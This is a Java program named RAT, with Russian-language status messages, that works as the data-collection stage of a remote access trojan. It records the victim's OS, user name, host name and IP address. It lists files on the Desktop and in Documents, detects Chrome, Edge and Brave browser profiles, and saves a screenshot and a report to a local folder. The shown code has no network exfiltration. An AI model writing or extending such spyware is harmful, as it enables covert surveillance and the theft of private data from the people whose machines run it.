import java.io.*;
import java.net.*;
import java.util.*;
import java.awt.*;
import java.awt.image.*;
import javax.imageio.*;
import java.text.*;

public class RAT {
    static String ts = new SimpleDateFormat("yyyyMMdd_HHmmss").format(new Date());
    static String dir = "rat_data";
    
    public static void main(String[] args) throws Exception {
        new File(dir).mkdirs();
        System.out.println("[*] Сбор данных...");
        
        Map d = new LinkedHashMap();
        d.put("time", new Date().toString());
        d.put("os", System.getProperty("os.name"));
        d.put("user", System.getProperty("user.name"));
        d.put("host", InetAddress.getLocalHost().getHostName());
        d.put("ip", InetAddress.getLocalHost().getHostAddress());
        d.put("cores", Runtime.getRuntime().availableProcessors());
        
        List files = new ArrayList();
        String[] paths = {System.getProperty("user.home")+"\\Desktop", 
                         System.getProperty("user.home")+"\\Documents"};
        for(String p : paths) {
            File f = new File(p);
            if(f.exists()) for(File ff : f.listFiles()) 
                if(ff.isFile() && ff.length()<10*1024*1024) 
                    files.add(ff.getPath());
        }
        d.put("files", files);
        
        List browsers = new ArrayList();
        String app = System.getenv("LOCALAPPDATA");
        if(app!=null) {
            String[] b = {"Google\\Chrome", "Microsoft\\Edge", "BraveSoftware\\Brave-Browser"};
            for(String s : b) {
                File prof = new File(app+"\\"+s+"\\User Data\\Default");
                if(prof.exists()) browsers.add(s);
            }
        }
        d.put("browsers", browsers);
        
        try {
            Robot r = new Robot();
            BufferedImage img = r.createScreenCapture(
                new Rectangle(Toolkit.getDefaultToolkit().getScreenSize()));
            ImageIO.write(img, "png", new File(dir+"\\screen_"+ts+".png"));
            System.out.println("[+] Скриншот сохранен");
        } catch(Exception e) {}
        
        PrintWriter out = new PrintWriter(dir+"\\report_"+ts+".txt");
        for(Object k : d.keySet()) out.println(k+": "+d.get(k));
        for(Object f : files) out.println("file: "+f);
        out.close();
        
        System.out.println("[+] Готово! Данные в папке "+dir);
    }
}
